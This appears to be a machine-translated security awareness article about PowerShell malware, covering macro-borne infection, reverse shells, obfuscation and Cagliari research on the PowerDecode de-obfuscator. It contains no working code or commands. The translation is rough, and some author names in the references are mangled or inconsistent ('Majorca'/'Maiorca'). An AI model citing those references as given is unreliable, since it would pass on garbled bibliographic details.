Most Microsoft Windows users (in particular, system administrators) will have heard, at least once, of Windows PowerShell, a command interpreter (more properly defined "shell", very similar to interpreters like Bash on Linux) through which it is possible to "drive" various functionalities of the operating system. These features include, for example, the ability to copy and move files, to download applications remotely, but also to check the list of services currently running. The commands PowerShell they are also called cmdlets, and represent a combination of functions typically enclosed in a single command. For example, the cmdlet ConvertTo-XML creates an XML representation of an object.
What is certainly less known to insiders is the fact that PowerShell it is often used to perform malicious functionality. The idea is simple: the features provided by the shell allow you to execute advanced system commands, which can also be harmful to the system itself if used improperly (for example, loading additional files into memory, downloading malicious files from the network, etc.) . This is a huge advantage in attacking Windows systems over traditional vulnerability exploitation techniques, which involve the execution of malicious code by exploiting vulnerabilities in programs already present on the target machine (typically out of date). Through PowerShelltherefore, there is no need to exploit application-specific or operating system-specific vulnerabilities, but attacks can be carried out directly.
PowerShell it is often used indirectly through the use of infection vectors, often represented by Word and Excel files. In fact, these files contain macros, or automatic procedures that normally should facilitate the writing of documents or spreadsheets (for example, automatically filling certain cells or performing certain calculations on multiple cells). Also in this case, these macros are often used in absolutely "benign" contexts, but they can implement functions to generate codes PowerShell. Furthermore, PowerShell it can also be used directly, by creating a reverse shell that can allow an attacker to use its full functionality.
Another feature of the code PowerShell it is the ability to "hide" from the eyes of an analyst, in such a way as not to make one's actions evident. This feature takes the name of obfuscation. It is therefore possible to take some very simple code and complicate it enormously, without changing its semantics (that is, the program works in exactly the same way as the non-obfuscated version).
To counter and analyze malware PowerShell clouded, scientific research has, in recent years, made great strides. In particular, two studies of the University of Cagliari [1,2] have developed efficient techniques to be able to de-obfuscate these attacks. In particular, an open-source tool called PowerDecode, capable of obtaining the code PowerShell original from its blurred variant. PowerDecode can be freely downloaded [3].
Malware PowerShell therefore, they constitute an important risk for Windows systems, especially when loaded from Office documents. The research is however active to propose increasingly efficient solutions to be able to analyze and detect this category of attacks.
References
[1] Fr Ugarte, D. Majorca, F. Cara and G. Giacinto. PowerDrive: Accurate De-Obfuscation and Analysis of PowerShell Malware, 16th Conference on Detection of Intrusions and Malware & Vulnerability Assessment (DIMVA). Springer, Gothenburg, Sweden, pp. 240-259, 2019.
[2] GM Malandrone, G. Virdis, G. Giacinto and D. Maiorca. PowerDecode: a PowerShell Script Decoder Dedicated to Malware Analysis. In 5th Italian Conference on CyberSecurity (ITASEC), 2021.
[3] PowerDecode. https://github.com/Malandrone/PowerDecode
